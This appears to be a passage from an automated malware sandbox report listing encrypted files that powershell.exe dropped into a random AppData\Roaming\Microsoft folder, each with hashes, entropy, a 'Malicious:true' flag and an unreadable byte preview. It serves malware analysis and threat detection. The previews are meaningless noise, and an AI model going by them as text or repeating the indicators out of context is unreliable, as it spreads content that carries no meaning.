                                                                                                    SHA1:5815AB4508C80E5F8A4323692768C2238F593A57
                                                                                                    SHA-256:2C0189FA9705184F1D1FE85AE9C1B64AD98A692F564FDFD82F387603212AD444
                                                                                                    SHA-512:3E82FE79E4317979B6E9B687D25E0C7477AC2E8D4A1F3F5A78FF546DC864A70348D1ED18C4A6081C9C00D44421CE24F73B502013F59EA591E4E01000706BFA3E
                                                                                                    Malicious:true
                                                                                                    Preview: .#...K....D..x.s..u0r..h]..cs...."'sy.P..az...wQ#..H...d..G.S...y.Q7.I......K.3@.k..Fqiv.=.H...!.....D.b%.)Y.I..[._.z2h....6.....t3T.'.1 .@.?..4.UP.Nf5.*.7..q.D...;...8.I......Vh ..~wL>.*..k.4.D0].T.\.v.T.p.S..^P.Y.I...4H..bb._u....Q|.r....r...^DK.....'.'.=.'.e.J..3P%Q].9.y....`s....).iJ.b.|.iY....r.JrxfV.W..d......u...I.6.-.O.dwH.j...h.Vs..B......0...yO;.8F.I.......u.0t.0....e...G.%.iq......c...MM~`?.H.....;.`e..s...'!.>..S...6.T.V.$ .Q..-.n.9.67X.r.W?.o.x1..H.y....R...:....U.g@DO.q.M.xc (..5....f..6..L......k*.&....Wh.L....Bei.:.f*T.t...C9W...Qz..+...>N..Qw...^..,....%~.0....m."...=..%T.~...k.......WZm....;...../.\N....Y.e"T.....J...}.......N;&\Y*.W.M..v.9.bihLY.XS..#R.R...y...|.w...+1.\._.Yj.......|.8h...!....f...`u....?..R5...q.v8Q".4z;Iy.h.*...o<u....)....8..W.}..A...y.... .=....x... .O.AW.;..f..^..F.R&V......./.. `j.8J.6........1......G.e.......},..e..XC.e..(b.G..V....ve......%.#.B..KA.......u...@.D...yngw.b.F...v..`q......%U1.}^.I
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\YExswGcFQdmqReLk.yVEglkAHWTcpzJN
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):77450
                                                                                                    Entropy (8bit):7.997701539844603
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:AYUpbQLlumUsTcYqN04MiStNseZ8YF0C/lI3vnz8ekSt9KU:AYmbQLlumUsfxyCN0CdI3LNkcV
                                                                                                    MD5:998153722662CA9C49D6F9B31F51D25A
                                                                                                    SHA1:CB0A582E97FDEF0D412E22236BB992E4A8AE7711
                                                                                                    SHA-256:5BCD397552B9501E545C65BC4769008B91499B3153C1BC13A88C4425E9A0B042
                                                                                                    SHA-512:17CB653441AFB2263EF175D90C33EA880F0900C27339EBBAD23B48E78B285F896E83CE554C410C28DDF6A427CF327569B18321B6F8733BC66EBA32A2EA8F9E61
                                                                                                    Malicious:true
                                                                                                    Preview: o.....[.jA...>a....R3.2-a..x.Z5.....s..rK...a3.....;... N.>....q...a.$...M.....NA....".S..U.d.........y..../.S.A).....Q"h.d.r...SB.+:....\.[(....-.....~.].l'..........D..gR...r.E...e...v.4.[k.0..}K+..W."..zgu.vr..3!.54wb..e".K........7k....kx.5...\@...6...6.j..\.U;...Z....!....Un..$.$.]A..I.b.f......@....[..b...8.1.....l'H...'.#}...$O.I.....f.._..0..S...YZ..>\ ..T...u.>......_.c.SW........E.....n..`.Nr..;.J...~CI..I4..X..........,..j..O^.'j..p.{..+.r...."r..:........ve.}.v./.W...D.'O.....\T.....GS.q.C.....T.U......1...t..D..n.O..C.....Z.t..ZAB..-.T.H.h.|...o(}D...$...m.z.[`l...%@..o../..DXJ L0.+r..T..?.".,....J.|I_Z5..T...Z:+..Q3...0.w#.uM.B.d..*.=...R.s..-Z2...n5/k....R~I..w...R.+.A|{.AHH.c..iEP.e...!.Sj..i.u..'.....-..._...l1..e.*....}..b.d.Z.]HuQaE..8.(.8.*...C...c......W...]t..;.@..ed...8u....W....A..U6..xD9.N...O:...!.."}........yz..-B.j...6...m.....}.U..sx[..8.^8*.....9..;.^....]..7.m.\.<...f.CB4.hF.D.]v.....,......y$.!.\.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZBdPHgSRjJTyFKU.LYPlgSiyFwMU
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):165288
                                                                                                    Entropy (8bit):7.998963581279175
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:gq7fN2MCZMpJqFi5OF23GWl2Suvha5NI2AQDOrXizNxndsf4X6/KOLgF6yFNDJ:gZCkFiw47hNI2AQuKneA6hEF6I
                                                                                                    MD5:8851F504CD041702009DCC893DF611D1
                                                                                                    SHA1:5EA01BB4CFC8F408AC41E970EA7389935B2AEF4A
                                                                                                    SHA-256:DD9FB05BA49C2EA22DA285A223C00878E07B9F7056B336610FBE786F206AC2E0
                                                                                                    SHA-512:BBE1CFC68C9D9F13F979FE678C6A9B6B1DC4947B35E32125F2931CA1AD21007C4777BB7754D777AD55FDD303B22C08C8926D0F737AEC2851647D9A9CE336A0A1
                                                                                                    Malicious:true
                                                                                                    Preview: k=G...U.o.......,][.Z.$1..>m....7..>....T"..(X..&.dS.]".A".]...B.L.6.0?....Ao.a.dG..j.&..[...dR=.U...N.V.K...t.........%].|uC...l.GUK..2..h.....:.k...6.K../..V u.\l.7..T ..c..^..7.Q.F.n..&......a..4.Rz.....<..Cq:..>K..h..V.B..4.<..D.#......3..N..W#m...<{.0..^..*.7m..~.lf}........7l.7..^........O.8...b.M..`...{..`H6.NV.w...U...G.k..7.}...)..j..h....L......<P.....oW.Lp....f.-..y.w\....-3.ngO.LD.\...]8H..}.:..bf.M:...9...37qv..X....>................D..w..k.0H..>.&....n.|2.c....).my..r>.,Cz..~.....s.6#..D..O-.E..w.[&...t.......+...d.J..g.CV...b-.....#...u...v.$..K.-!v.q....(.q..~......*o..A....I_.....1*....~...V..XaLO..]..L..o..y...a..."..N.+..*.....G.K.m..g....m.V.b\)e.v..:..e...6....+...`g......./.H.."....V.l.d<.06..r....*........4.j...3b....|....nk..+...f....j,n.0n^3......h..8.F}i`...T.4.Rc..w=.c.x...H.....w`....'a.3f...W..{....S.I..|..../L[..Dk.A..k.[.z..B.r8f.dB......;.. .7.>.Y:<....N+v....>...fX~..[Z.f.....)9{.QC.r.'w.s+........f
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZJkgcGOoaTPenB.WLfQqizIwsuJxE
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):120436
                                                                                                    Entropy (8bit):7.99875624833529
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:ILrGpTcrQXs+NdI7uA6K7mKwY0Nf9nhUexAp+p:ILrJ8SlJfM9+e6i
                                                                                                    MD5:482F858B584A14A8CA7CB397C928E121
                                                                                                    SHA1:89625521238F57E58193B6C6F8868FDDFA5B1457
                                                                                                    SHA-256:2838F709803647806B58E95B739F7A87F331E802BD2CA840CA67B60CF30012AA
                                                                                                    SHA-512:A57961F63CB5631318C9B90298FC2A8C7F8BA46FB386A0FAA4DC8934586599EF94E9C81E05968753849B492B1795223A9DD281050A4572E948370D93CC4306F5
                                                                                                    Malicious:true
                                                                                                    Preview: |..J.......g..!,V...n".*.n......aH...=..^~..-0D.+.Z.m..RR....o.!...VF.0A.6.m.@Q~..#.~s...a.7..A..nLqX.-_..7.Se..r..KH.L..>...QB..~F......'e..!....|....!Ci../e.B...?.f^.U =.e.z.hv.v3?.D........a|..U..l.m..o...... .f.......^...j......8.Q.A......R.....S...'%......N4...[M...n....T..K.jmL.*Y....K.w.|.D.z..}N.2.).x.h...........D.{.4.Vb.....'..Ab...$.............."........?.\.Ja...B."...,..p..O@.K4.07...o..X.v......t.f.._.i.2.d[........6....y9Q...s7@...b.......s......t..kg./...Q@q.ha....JO.c....b.....G..x.....O ..Ec.e..*...o.)fY.<,.3 rqg.U.]\+....M..?......jn0.!n#.....W...L.....Z...g`^....;..?v.y.lY.3.RR.q]@.9B.6..ik.).......X...Mr2-M./.B.E....(~..zB.'A.AV..."x....+:VO<n.*s."J/.w../.....(..P.)(.^Sl.*.65.U*4.....#..'L.'h.l.........)V....X...h.....+....H.=.;94...qv.2.z...}..qEe..1......'.P$..<Z..7y...4 /7.@.DE.L.T..+.R....,U.+R.u[.W.ok........M)wM.^.T.w......cZ.\}.\(lP......(F'...S....4.-..c>/Y...C...x..6[?...Xw..o."+.WK...}.5....%9
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZSQcNEOCztejdm.quGefcAYyXgDSot
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):79616
                                                                                                    Entropy (8bit):7.99763458544086
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:XI2WKq7NJoY5wIanFPNW2SbId8REGruc6oxFut72xZD1LvKHcAsMnE5:ZWn7NF5wIanFPNW2Sb/E+ucR7u52xZ9N
                                                                                                    MD5:EE130997E1796F2EDB776570DB514D9D
                                                                                                    SHA1:55FF9E6ECCC1BE5BF1EA887C2E18C24495C8F492
                                                                                                    SHA-256:728C09759A54B959779DD4295CDD1C3697F31C5E138F378A7306B25B3A1A1E1F
                                                                                                    SHA-512:477DB1C10B1952108B6B7C4B8E429A95BA73AD202090E67C253CD8572B91F8556B964F658EC0D323324867FD6F21D0A6959FDCCE9F9B382A8FADF1F7FA2C277A
                                                                                                    Malicious:true
                                                                                                    Preview: .n.7.>...{r{.=..A.}.2.:.=......5Y.yB....a..y.k]..q.!.VD.pp.....FX.6pF...#....E..~4..n.5q....U%.._K'~.8 .73....;bo..2.X....].....;&..*.z...b.....l8su.&......>/@R..8.&&?A...._.\.D....^....Q.!......E.34*'.YE?........W.(Pn\.w,z.m.^!PR..|.7.?.x/.W;v!.).,......jG.T..D'........-. ........]..(;\......O+F=.e.4.....fWG...%.H8...k...Qfr...HB1..(2.6.0..q.?.....y...,.X= .....ju...%...uP.I............u.B.r....Q...J..OEi5(..?.....|j...2B$S=....~...gJu.?.=M2..>/.ubt.YP_p...O.I...;..Z1..y....hDw..F.G.F..Nm..d...].rh5Cmv..[j...;....<....d.!.:.cB...N..4..fDv...W..xs..hO.a.T..Z.=.<6J...k.i...&.2_...N.....P|C..=93mj."..._.{.:..] K.n:~.L.]..^....p.%=.W.`]..gI....!.....k...c.-./F..7.... ...JG.s.t...Ee.W..\... ....]%........WpFK.x...l....+..\.lD...7m...>.Q...r..../B...$..s.!.X.pa@e.............vW'...D..".lw.>.#d=1v.2&...*...%....0....4.C.%H.'....$.z...Z`.....3..5....o...;+i..../u.#..v=..YE....5.....s.w+.......u..aR.9\..&..%..4M.6..jrZk....\...i.11.-.bMC....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZfrxTeWIsXbjypzJFid.QdkxpCzEYg
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):151904
                                                                                                    Entropy (8bit):7.998778326132547
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:VB/A8E/LjY/Is7MUuxhXVuVOlJgbxU35Aa8tvVEvA2NJmNhDDg://AH/LVVvqb2ya4VETTEh4
                                                                                                    MD5:1BDDF39CCB93A4944013D9E0F064DCE9
                                                                                                    SHA1:32DFAD9887DFDF2E86ACC4E161DD384B4B1EED13
                                                                                                    SHA-256:44FE7CC928483B2A812599C8AFED5DC30F55ADC23CE4FE4B7B85014AEBF7F50F
                                                                                                    SHA-512:221BE327C33034E736581522C6FA4C9728F71FDF452020AB3D9894048C02CC202D85913B98BEB9992B73A942B65B6A48B70DA7896E9C33B619324CB69A287C5F
                                                                                                    Malicious:true
                                                                                                    Preview: ~.c. ..TO.;k...E..@T..-..I.d....6.G.......;.Q!B.{.C.*........M..B5oK..)..~G..(S.)A.P.~.%....<BfC.....w.......bk.#.6.).#U......Hnv[.\..8`../.D.....0Q..r^.!.x..*j7 .....;..;rR.......[.{...s.I....$1u.S...*......^`.Q.?.5'q.....E..F....g_Q1.#..a.(.....N[?.,..?t}I$..v/b..S.>........l.T.^#:...t..r5.r.2..-..|OCQ.."}....f..>l.........##...?.D......oB.R?.&...F.9-......y."..^.d.@.[.[R....)k..._.=...>..@K..c../g.sVe.YcV..+..#v.E.vo..'....<.;VP..o..@L.W.9.=t..o.5.>.Q.qh...d..l..`.*.=...%R3.f..y1).p.e.?. ya...w..... .4.CXp$....N...P:...uT8.04.......<."T.l".u.|..vZ........#.H^..'....?.<.S.......)+...].@..0.$.......6A.7.W.8..k.M4..f.;."....../B..$...$.<.3.#..v...PR..{.7..V......`A...a5....FA.....F..q.]..=S.l./.vN..r.qf....=....gj.bXg.{.U....I6.X..V.......=s.z.....]..uy.c..j.r.y.DS..m.Y..=.....N.......B..H;q..Z..c....T...8.<P...6.U..csh NO../r*.~.l1.o.)H.N`.|U......$......h..p..R.J0.........l%C..G|<.j.N.....)kW.....Y..KgB..Y.,!..m.h{uO:...yX6..C....L|
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZruqUQNTAMoJiEPvgbj.TQjvYIWgdJHxl
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):148492
                                                                                                    Entropy (8bit):7.998773719585919
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:8fMPifWgn2Ig0/KehhnNGeLgBukUC26iy9SAhGf87E2:1YZn2IgKOqJmvREf87E2
                                                                                                    MD5:1EDC8AFFECF03D0149AF4EF98449FF5D
                                                                                                    SHA1:F7A14E1989DC64EDD06392D28EA077C59C2971D6
                                                                                                    SHA-256:75AC552D525FBFE22843DE64E0B14204B50E2A579B28C8569B47C8D2EE34FF96
                                                                                                    SHA-512:062DE50A577F446F30883D6CE596AF3505BF6DD02B9A2012B0B59D4C56E86C584D6C59D62661EA93A3FCDCDC6D805F98EA3D9D0A538C2AA37A8F8753B2858377
                                                                                                    Malicious:true
                                                                                                    Preview: ...H..a.{H.5U..!......5.P..|..-<.$....L...Q..`.y7..-... .q...A..>.(..h..'J..]..YS.?..)...C.,.Ho..y.Ns.X...3..Oj...t6....i?4....;._..6Xd")m..T.....e*qz.7.~ks:6@....eap.R......*.[.6..v.......6.:\.E.[....d..0..@...M..h......Z../..r..'.9..J.........u9[...x.3G..c..[p..s.........F....<'....k.8..\Z1..g..k..."Z:...&...4.....W].~..fw...%uq............g.......^..._...*5..-.sA.....T..Mx....5)q.0../.....`X9S!..]..;...mc*Xa}c..C=0...f+.4.. ....,.|a...R~~(qX..\.......LH%M..Q.?.N.h..<.....G.y..A*..:7........e.[.I.d...o@.Y"...mP........-......5q$.IW..?.{A.........uU..|.V..x..c..g....L_D...9..LE.....U.,..............cZ.]../.+..g..^.m...Y...s.0.d;(.A.N?.n..i...D.c....7........o%.%V... .....C......d$..|0..~D.f@..\...mBo..F.. _IX...?5..../.L$..Foq&.-!.U.5d.v...Tk".Z'....,?..!..."...K.8^>.'X.......Hf..^.u>u..e..2..%.o..+..0g.h..i...o...J.rtL..R...}Z.?{.!D......-...*a3.3.S.<K+.Z..........1...!./X....E.`.......t8j.M.I.."..\.{..s..5K..3?^...Q..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZtRIfkCwMOyJL.MCVJNRdxSHsOvY
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):169723
                                                                                                    Entropy (8bit):7.998940561346495
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:xUlL+0ZfNpqrhIWH6r0ngdN/vffArMprrc2homhCNrwICWr0Nv8/xFLv:xUl607pahIEWkgdZvfhfmm4IWd/xFz
                                                                                                    MD5:6CC6327CB09A27B6D9E1CE18787C87D9
                                                                                                    SHA1:EB3054666BF22AF47258AC89861729EDC8863328
                                                                                                    SHA-256:5097242E5651626CEFEB79387DA1116117C6AB476A10985617800F4354E23D04
                                                                                                    SHA-512:11F0076F683F11C1CF14A58A98288C7881A44D3A0BE9B4615A6235DB913110B0878AA7C1EBAC9D19387F1524A7C331CDBE35E854D4CAC32FC6D0B9549488596F
                                                                                                    Malicious:true
                                                                                                    Preview: .N}.?.x<+.Z....}z..U.Y._.g...v..I.v.,{...y.O..y7.X..%.-.......d.8P.._oP...ocdGV..eO..v........N.?...t.!..cUC.Bp.0.H...l.3..A8..!N%0..y.-w...R..fH.0N./UTL.@H..s.{"{.@).p..m..,.1........Q.8D..._.0.p&..4....oJ.FW..3..[Ld..8.w..P.}.....V0]D6.H$.L..+#)0$.G..^s.mT..t.M..s.........*.C%.SomH..8..X..;z.I...S2..Q.r.H,)/.z.G.`O;...2L.Ld.,.m..=P.@..rt+..;.....k|.:..G.....D...z..O..u/.z..}L..1W..5.fl..{X...X....p.....d...Tj.......v...K.y.%....K.|.....kb.m......{..&H.K.......c.6.1.v.".AZ...{.....%.w. .....'..S7xJX....al..ux.y...E..UvdO.w{..T......@..v:.I .iCd.A..w@.Tv.A^ u...=..-.Z....7p.ZbD......=/...)..x.pa.x..%..g.'w..0.#+.#.TsO#...r..,..)....8....kz.xM+y...).3....K....`....~.....qi.^.a...vR..%5..t7..2....!.....}(...'b.w&Y.`rlD....7..f...e.py..............T..X.q.....;b.W.A...Lu.`...+.| .wx.(...v.b...9./....5......=..u.B.>.]4..i..k..qk...a SAo.C.%18.~.8f....|G<E.>.Alb1....... x.1.j.P.o.).....P.U.....x.-p.i...1.h0..6.M...~..M..*,.T...B.p.....^$.&...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\aAKldTqByI.HYTkiUoQzp
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):56621
                                                                                                    Entropy (8bit):7.996747004507503
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:G5y4Gs9vKGe3NQE9ATOBx1uUlr8YhfM6xHJKSWxBwZwfvPz8Q:G5jGoKGe9t+8BG6zmF34Q
                                                                                                    MD5:0F1B56250B83C05512B33694D0D8C07F
                                                                                                    SHA1:4A6F528E97910A740D4C95EF1400D79DBFA699F1
                                                                                                    SHA-256:584459055CBCDE03E8A174674DD9D177D101DF725A983EE4FF43AF2FE170B33F
                                                                                                    SHA-512:0403FC259B05E3CF7B963F8649AE071DB68D68D2379B3B290F6BA1947BFD2C9BA83F64DA4BC4934513AA96AE21956F0DA9423F3815C3A0349F14D0B3FC0BE235
                                                                                                    Malicious:true
                                                                                                    Preview: ..F.?..z.^...7..#.-O.pDa...%.h..8.iG...(...........w.3.....b.5xL#Or.@'...@.+G...`5.}.B.C.6a.7..L6.M....O.rc.;.{.x..1......i......<.]8.XtSi.v..o.C. ...AzP*|W.p.~...b....-.........&Y.v.....U.X.'...._.a.2.1%.^.....v.;...4...Oy.I;erC..D....=$.M.#. `c..]7S{A:..p.38M.w.;E)..J..S_,......b..|.cMp...I,.y%.....C........Eg...|.`.y.k>...R..qOvgD........P..T<........Q .....c..(@..O.sn3iy..e.2e.+!.v.Wk.e..w...,..L...@.?U....I.m.L..y...sh..9.t...I7..e#...1.u.3>.....)M...g........2.~.u..3\!.X.5........{..........`9!...k.B.o..R{...V.....@t.|.).d_..x.p.9.$=.S..7...5]"?&..+Mh.{u...,.k....h...9.....t..=..kBE......e......j...~nS......)........L....9...[r..b..<..(..}......h.ml...oR...[.v[.I.....?...VvR.fRv......oK.:.k..IR...H.....1)...R..F...8..Mi..O-.A.p-N)..<.ER.c>1.;g.[0..............u`.I..G.P.8&[.*..7...0..bRl...gN...f...?.Z...7.EZ.......W...!+.....3,..{.I.2...G...1..%*.[...9X...[.'.7...v9..JAk,..r.b.:T...U.&yK....u'.\.I;.....,./..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\aUtheHQOTCRdwsVD.hDORUVXsmCy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):80971
                                                                                                    Entropy (8bit):7.997476059584378
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:CAumUxhix9QAnO8Ab7TEq+2DBwcSD6n1Yw45bRW/:MmUxkwk4bRBwLen10e/
                                                                                                    MD5:C8DA523443862D2B69E05B73DC85E8B7
                                                                                                    SHA1:61597ADACB6237839EB58F8B248C892E79F93EEB
                                                                                                    SHA-256:DAF75EC4724D87F099F806899563B5B561610827600B7C91DF70D276932EB446
                                                                                                    SHA-512:DFAE075E208E833EAD7A5A5A7FADECE1FAFB735D420E464980600566E1B555E09E3A537461F4593BD65BCD4280A263205A53A32330A474B001A5D3520AB740CF
                                                                                                    Malicious:true
                                                                                                    Preview: .H......F.{.Z.......<&.....[.@t... ]....M.=.E.%.q..=.`.a....}.A.$.F...#?...|...c.&.....4....FY..h ..S.....P..... .z...e.nS..0=....ev...R...n.O......ro..q...f.Gd...$.'..c.....$!\.....b..m.:.`..V>1...........`.dx.U..z....m.>....... .E.j..a..o...X.!...[|. ..{......F..oW<..W.(..7~P"|.m.I.0.<..Mo....9...\.[._..^FI..'O...?...t.UO..{.D3|.F.;.M. N.e..F\...>.&...|.N`.r......>J.n_....f..:..UU.=)...pF..c..U{eB..o.)/.u.F...!...,.........{.'..s..PIH...Y.g+<(.O...q.SE,Z$...........A..Jq}.C.>.P....u.G.$.$%..O.O..@.ut.&<.+.k..EC...f?J.S..-...c."......N.p.;.>...V...Lq.".....`....5H^.U...2e.C.T.Tt{.E..._..U..;..{..RFp..As?.R.k......}o.6.....E...........3_..p..K.O......G....-H.9...z. 2y<7..V..T:..w.....[).c....Z.C.f.n.Y.qUR..K.....N|...`.6....`P..As.F...q.%...v..n.q....m"..6...:J^a....bB...$...\..J.h.....:.......W...e.S.}m..n')........Jf...Oo"[......./..}j..,.X.N.I!.......Pv.J.{.pf...P.oA..Z....!6.o..&\bF..o...N..rj..@.W..1........GR@......q..LQ.R.U./....0C....i..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\aXZEnQmNxzMJRpYObw.RenMfXQBmwdz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):156854
                                                                                                    Entropy (8bit):7.998888113944318
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:WK8z2lwgDvGqcPtQUbq3zKh0zgRcxWD1KIKPSaGp6gZ6a:WKozgDvGNvbYTzgRc0D10NGp0a
                                                                                                    MD5:83EE8CDD6F3101434761E45CB6D273FE
                                                                                                    SHA1:646429A916026ED8FA68E4265117ED0317423EA9
                                                                                                    SHA-256:5632952544DAB9E2CBCEE29AAA7C8743EECE6F94E543775B0C171FD058919B45
                                                                                                    SHA-512:21FA497CB1892C97AA4A6B5FA064E2601BB12A2688D8675478C83F5D1519B005BEC0879A2C1811194CAE6B89347DA68DCD509F531BC0E47700BEFAC2115583D0
                                                                                                    Malicious:true
                                                                                                    Preview: |...)..........^.........7.]......F.D.|.u..z....U..."....'0..K.r.JM.wA0 .....K...c..#..$.E.D..n 91..[.NYd.T..R..o.R.'..S_....v.6_....:.B..*....z<...o.r..A..=.....]@4...\.....H.b...:.>.C@[.<K...M.....W.. ......6\...k..;C.gV...zL,g..KZ.7PY&.h..=(.e.O.;.M..5...,@...4~./.....P."R...R.......9V..'......5.e..N9...C...-E"8.?4...~.T.iI...$w.@g....s..p:...(..e.8..v.9.|..9.b.....=.!.....w.S...Q8..G...7p.P..W..v.n..^@..B.[..2~..B.E.#.,n..v.f.1L.@I_T.q.o.f$.......1.K2....'`...59...Q....J....n[6.....d..f.H{.}.M.Y.....8...........:.f..k~8.8..R.aZ;.]..z....u.../..Wu..-...Q...GO#.?.|&.....L.GrxV...G.0#..)........?.0..(P.a...y,..b.rn....EAM.6.7yz..R.:p..p.. .co88A.[...3d..]|..(..^.'....c...g...yH.........rZ.w..p.&.VV....~Q)q6:...Q.>...L.j...N......O."..t....8..].E1.n...XMy.....?..".}..-C6..&2..(.U|. .0D|.6.{.gZC..J...*.".1....|7G4.....X..7...y.<..K.X.hJ..w.0/......H.I.c...Nt.,8@.n.......X.........G#`.E.Kr.'kq...s.F..G{..b.M..L.F....%L.he
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\abKgFMrHtlPdVuRfCD.rKbtqsNWCpDvMlnmgAR
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):162575
                                                                                                    Entropy (8bit):7.998813582513272
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:VKtx75D+kH25I/xePStx6qr4tuVwy8P16rCern7p8hgVrkxi+t2Hb:Vsx7AkH8DeMqr4tuWv6rL3p8mV3Hb
                                                                                                    MD5:BAF4CDD80BFF43810D28E52CF5DF38EF
                                                                                                    SHA1:F6D722604BE71ADE778F0EB768AAE1CCBAA1B990
                                                                                                    SHA-256:13A8D9F0B29C8F6349D5EA6631F730D1AE22D9E476F355282744F54E9B246CF0
                                                                                                    SHA-512:EEF73BDC9CF9DD184DE3B05C3AB15A777DC18370CE19CB53169773AF598595C860DEF1F29D097F7B17C2795C4E0325984323701F2C8D64D69C6F36CEE6BE8365
                                                                                                    Malicious:true
                                                                                                    Preview: |K.sg.=.9gj./........>...<....Z.g..E.Z.@....f6>.?.O..5..Q.S.0^Z....$K.E.IQ.+........'2G..}....B..zn|o......e.u..F...zYWF>...s-.o.......M..r......3...........m8..^.....+H.n.....Y.Q....].0.}Un...?..>..1....(F`..>.o.x...^u...te ..~.+...N.Kv.mo..j......)..xI.]........h..`Y>..G.]..B.......$...b..4...K.3....0f0.......:.xqdv.LY....R...o..^.......v......?t_..+7...=N..|.F..O`6i.Fy5..0.....!&.C.(.8.\..?..lrv..^...6G.,).....$.).....I._..8."o.b.Yl...s...Hg.?t.JBf.t#.k.<...V.E.q....2......HBd...>.....^.%H...,....Hg.p$,j].fN..&<.......N...2b.>H...}.o..E...~...v..d.@.P.o.k+J..9....8.f ...97.9V....W.O.P.+\.K.k.Q).>..D.}..Y7.1._..UP7..M.....]4.V...NH............./.h...-OC..a..."Q._...^......6,....=.g.^.Oh#.W../.6.=.^..c.4IfS......ez....g;;.....$.B..Z..CK....[...3..\L.<2.N.[s};./.G}.w..7.m..l....n..NF.d........MR~...%..OL.m.Nq...h[.7".J.N.c....O.,......a.A".f...c.ZG..[..."=L...D0...W/@.9..._R..<..Ez!l.......f..!....*..nRA!..72.9.{...4.<...H.-.>r.O...>......
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\abpfVnJNdDg.tCRiUoQgSVrvlh
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):152349
                                                                                                    Entropy (8bit):7.99884013222276
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:EKxVgNIYefB8wFgR0C+PUlf0Urzbn+MYWUOzFbBr+VevyXbb4nqe:EYMIYeg6PSf0UnT+BBCNyVYM5e
                                                                                                    MD5:0396F6176818C09F13469C7A1885CBE4
                                                                                                    SHA1:A471AC3B2C4E4F18624A83D0C2A11822ADFB40D3
                                                                                                    SHA-256:447B1B236CC9561588644B11141A2F0D6F2EB08635ECB5B09323908FDCAC169C
                                                                                                    SHA-512:528F7F1F5081C1FD7E4294B98E120D0533145D825976DEEEB58D7164C5B539DDF30AE763E2139287BBDD4787CC97A2AD4E6D1CF91106036A274EEB5D8AB4DF2C
                                                                                                    Malicious:true
                                                                                                    Preview: f.#.M!UM.!zU..3.(.m_.U.....9...(x.@./..k.5.x S..R...........oi.,..>.L....k.jI..w_../..r.m.?.....y'.YB...b.W;..4...wF....0.W.$.v.!.D..>.8.n....{.......)...c.*|v]f..?..">@.q.tO...nU..@...6,|...c..H....o..Z.S.A. .x..t#.}..e...s8\.iJ*..a+.j(z..x.7..i.o..;..k.9...I.DN9p....~*._....d...l.c...G1H.....;.q.\_.p,.......[..C..8..6.............x..?.0..@....o/9-{)]X..c...qK..,.T.4pM..V.f...uH."._.g..4O...y.....-#..EL5e.mg)h..sF.v.saQ..y....C%.....2v(7.&.....&'7(...g...j..B.).....K*..Q.u~S...:.[..2w...<AJ..s.L...n.....FcS...D.,6.&u#..]H....K.0o..eZ..\01->]h...<.%.y..:.~..W...iQ......W...5....Ui&.q'*...j..%?.....`d..)...H. .....t..;...n~w.<6N..n..4nH....I.Or.&..5K$.C...;...`....S....h.vd...4..{..I.*.V...@....4...<y...+.k|..|eA....b..,.(0.{..SQC'?....... ...A...b.Fo.BL...zc.8.9=...D..P..).e.-h..J..Q....Q..&......N......i#.-.L....f....I7...:].....y.c.>....t7....m#.|O..H.}u/.JR..eq#G..q]C|....c..0....6.d.z...A.&qi..W....E..o...q{.....?L..E.=El&.E
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\anGipsDqgQuNW.YRCflarIkSXmUFcz
